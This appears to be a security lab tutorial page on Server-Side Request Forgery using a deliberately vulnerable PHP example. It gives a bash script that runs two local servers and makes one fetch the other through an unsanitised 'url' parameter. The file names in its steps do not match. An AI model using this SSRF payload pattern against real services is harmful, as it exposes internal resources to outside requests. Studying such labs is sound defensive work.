Server-Side Request Forgery (SSRF)

https://gitlab.com/jobertabma/vulnerable-code/-/tree/master/ssrf?ref_type=heads

Step 1: Understand the Vulnerability

External SSRF Vulnerability (index.php):
- This PHP script fetches the contents of a URL provided via the url GET parameter.
- It doesn't sanitize the input URL, making it vulnerable to SSRF attacks.
Internal Document (index.html):
This is a simple HTML file meant to represent an internal resource that should not be accessible from the external web.

Step 2: Create and Run the Bash Script

1.Create the Bash Script: Create a file named ssrf-dns-rebinding.sh and add the provided Bash script to it.

#!/bin/bash

echo $1 > _tmp/strip

# Run first web server, serving internal documents
php -S 127.0.0.1:8081 -t ./ssrf/internal/ &
# Run second web server, serving external documents
php -S 127.0.0.1:8080 -t ./ssrf/external/ &

# Access internal web server through external server
open 'http://127.0.0.1:8080/?url=http://127.0.0.1:8081/'

wait

2.Make the Script Executable: Change the script's permissions to make it executable.

chmod +x ssrf.sh

3. Run the script:

Expected Outcomes:

The expected outcome of running the automation script is that you will see the content of the internal document (index.html) displayed in your browser. Specifically, you should see the text "This is an internal document." which confirms that the SSRF vulnerability was successfully exploited to access the internal resource.

PreviousSSRF-Dns-Rebinding NextServer-Side Template Injection (SSTI)

Last updated 1 year ago